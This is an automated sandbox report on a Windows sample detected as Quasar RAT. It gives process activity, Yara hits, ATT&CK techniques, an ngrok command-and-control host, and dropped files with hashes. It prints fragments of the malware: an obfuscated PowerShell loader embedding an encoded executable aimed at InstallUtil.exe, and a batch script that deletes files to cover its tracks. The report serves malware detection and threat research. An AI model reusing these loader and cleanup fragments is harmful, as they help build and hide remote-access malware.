Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\full.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR

Remote Access Functionality

Yara detected Quasar RAT

Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	211 Process Injection	1 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Install Root Certificate	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	11 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
full.exe	5%	ReversingLabs	Win64.Malware.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat	100%	Avira	BAT/Delbat.C

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://groups.flytap.comtls:	0%	Avira URL Cloud	safe
http://192.95.0.175:3003/loginhttp:	0%	Avira URL Cloud	safe
https://groups.flytap.com/FlyGroups_UI/Entry.aspx?OriginalURL=https://groups.flytap.com/FlyGroups_UI	0%	Avira URL Cloud	safe
1.tcp.sa.ngrok.io	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipwho.is	108.181.61.49	true	false		high
1.tcp.sa.ngrok.io	18.231.236.52	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipwho.is/	false		high
1.tcp.sa.ngrok.io	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmp	false		high
https://groups.flytap.com/FlyGroups_UI/Entry.aspx?OriginalURL=https://groups.flytap.com/FlyGroups_UI	full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://192.95.0.175:3003/loginhttp:	full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmp	false		high
http://.jpg	full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmp	false		high
https://groups.flytap.comtls:	full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.181.61.49	ipwho.is	Canada		852	ASN852CA	false
18.231.236.52	1.tcp.sa.ngrok.io	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573924
Start date and time:	2024-12-12 18:02:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	full.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@20/11@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 18 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.217.17.74, 172.217.19.10, 172.217.21.42, 142.250.181.138, 172.217.19.170, 172.217.19.234, 142.250.181.106, 142.250.181.74, 172.217.17.42, 172.217.19.202, 2.22.50.144, 2.22.50.131, 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: full.exe

Simulations

Behavior and APIs

Time	Type	Description
12:03:41	API Interceptor	2x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.181.61.49	Cracker.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1.tcp.sa.ngrok.io	file.exe	Get hash	malicious	Njrat	Browse	18.229.146.63
	bQ0v.exe	Get hash	malicious	Njrat	Browse	18.231.93.153
	bQ0x.exe	Get hash	malicious	Njrat	Browse	18.231.93.153
	uMzkM1DVFy.exe	Get hash	malicious	njRat	Browse	18.229.146.63
ipwho.is	https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938	Get hash	malicious	TechSupportScam	Browse	108.181.61.49
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	103.126.138.87
	TeudA4phjN.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	http://www.sbh.co.uk/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	103.126.138.87
	file.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	file.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	ugjigghFzZ.exe	Get hash	malicious	Quasar	Browse	103.126.138.87
	http://web-quorvyn.azurewebsites.net	Get hash	malicious	TechSupportScam	Browse	103.126.138.87
	http://womenluxuryfashion.com	Get hash	malicious	TechSupportScam	Browse	103.126.138.87
	http://editableslides.co	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	103.126.138.87

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN852CA	jew.sh4.elf	Get hash	malicious	Unknown	Browse	75.158.230.151
	mpsl.elf	Get hash	malicious	Mirai	Browse	198.166.177.229
	mips.elf	Get hash	malicious	Mirai	Browse	142.41.252.248
	https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938	Get hash	malicious	TechSupportScam	Browse	108.181.61.49
	PO2412010.exe	Get hash	malicious	FormBook	Browse	108.181.189.7
	rebirth.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	206.116.110.1
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse	108.181.135.156
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	142.82.198.6
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	173.180.89.128
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	142.241.53.168
AMAZON-02US	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	185.166.143.50
	hoTwj68T1D.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	54.231.193.17
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	hoTwj68T1D.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	108.181.61.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	108.181.61.49
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	108.181.61.49

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.144086598890895
Encrypted:	false
SSDEEP:	6:kK7XL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:uDnLNkPlE99SNxAhUe/3
MD5:	30226766F4B3D0E00922EA78F3559554
SHA1:	A0F8C30A0DF507DF64CB99227BE34CB2D3D2887F
SHA-256:	274380D6D327EA13D303CAFE3C04C476E8246FCE004FA72F1F4B84F9EC681E66
SHA-512:	014F56D29B4B93EAEA90AE0E956B86BB275A8CBBDE8E2291CAF8E5C68B29BC905AE1D2C72DE81CD403227DE84C220C12146405A9B85381E744488F4492C2F7FD
Malicious:	false
Preview:	p...... .........4..L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2047
Entropy (8bit):	5.338128919349986
Encrypted:	false
SSDEEP:	48:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HDfHKdHK8JHoHK7HKmTHlHA:iqiqxwCYqh3oPtI6eqzxTqdqCIq7qqFg
MD5:	4E0B9E4D3B18975CDC8448466E02A33B
SHA1:	DC5E5E328B7436E260A3DEB28DE5DCCC9FEEAD0C
SHA-256:	75C541E0691D37BEE4685FA87C1C3668C4F7CB0396F9A5AE5C4627071952CA62
SHA-512:	E1D4FEF5454EB71DD01B80BF234A1977E6E085552CE93FA7D88B623CFA984AD907A9BA9EFE7280FB690FC77DC0826EC68EC10D838D80AC2FBB37AC881E6F043A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.773832331134527
Encrypted:	false
SSDEEP:	3:Nlllulx/:NllU
MD5:	5D9E8D01DBFF846EFCDF95444160A4E2
SHA1:	4C6B258F023994108CD7092D2C75B151F7DAD729
SHA-256:	615EFFEF67C8EAB7B3A76867C498863A4731568BE643E26F560E3F1E0494669B
SHA-512:	1B9C8CA94519FC216467B84DA9C78ED98E8ED4ADD5AD8AFAE56641FF849F449A960F9134640F86E93E10B52A418BB367A1ACEEDB5F94BECBB4E4BADC01B076B8
Malicious:	false
Preview:	@...e...................................R.......................

C:\Users\user\AppData\Local\Temp\Adobe.ps1

Download File

Process:	C:\Users\user\Desktop\full.exe
File Type:	Unicode text, UTF-8 text, with very long lines (36038), with CRLF line terminators
Category:	dropped
Size (bytes):	11162050
Entropy (8bit):	3.9082779636087626
Encrypted:	false
SSDEEP:	24576:AORR6jvaNQwuWdp9eU1vJfZfjwhIdGunHW5IHiMvE5A3r2OL2hHd/Mi1MYCIRwtf:em5tj4FMYHkDOE7xGaX
MD5:	90A005927B1D759D4DD93E4721A93585
SHA1:	30C42C6BCCCC8CE4EFD56AE8D7A88BF15023E60B
SHA-256:	590F970E72E38B034ECCB2839F763954258D6BF237AA087F31FF4F3951E07D15
SHA-512:	CC9F478E9111D5A9B55041A9689232DE2F3F6C7299EECE438AEF3CBD3D5D62441CF658F3E36C7401BF21B60F8670F03A695EF5A08B6D6945FE4BCB38A6BE4AEA
Malicious:	true
Preview:	$dadqdqwdwqdfqfqpoiu = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'InstallUtil.exe';....$dadadqwdq = '.:.';..$dasdafqqeq = 'A';....$ummtu = 'TVqQ.:..:.M.:..:..:..:.E.:..:..:..:.//8.:..:.Lg.:..:..:..:..:..:..:..:..:.Q.:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.g.:..:..:..:..:.4fug4.:.t.:.nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ.:..:..:..:..:..:..:..:..:.BQRQ.:..:.T.:.ED.:.CsS.:.P0.:..:..:..:..:..:..:..:..:..:.O.:..:.DiEL.:.V.:..:..:.JI.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22m3fc5x.1kg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pl5kkvy2.b43.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	223
Entropy (8bit):	5.424540011871844
Encrypted:	false
SSDEEP:	6:hC47bxrBeLuVFOOzCZGkLW6qRndLvKOZG1qLTwi23fM2sH:d5r+uVEOW8tBdwZk2sH
MD5:	CA31C79765AFCA2DF4ACF19FD199229E
SHA1:	60A94A24F2F95962F44820A88A3D20F9C74A6166
SHA-256:	43FC532DBB01B04BA9F2C8617233D203D1CD0CAFC0089972E14E09503C8EC838
SHA-512:	7EF7CEB3A87BAD49B3E2C7E84F68C3D972403C72A2C96F6A7B2C3C440445A342331A6B5A73D380F318F8DE8F348A6318A3FB3DC168B876C9A04DBC2383FE94A2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..del /a /q /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat"

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\full.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	464
Entropy (8bit):	5.127373603808216
Encrypted:	false
SSDEEP:	12:cfygzgypRmYPZkoQLSZoKE0abtJo6oTF6dyufibtJx0LqbtJxg6Bv:uz5eSkYF2yQRP6Bv
MD5:	56E3D6FC991A4D6902ECA1BECD728242
SHA1:	DA7C478FA5ACDC18477AC0239B9FD2665B3A5D2D
SHA-256:	7652881B614D8E1F546631BB6EE297C7F9102CB7F81C3EFF66ECEE3A077DBCE5
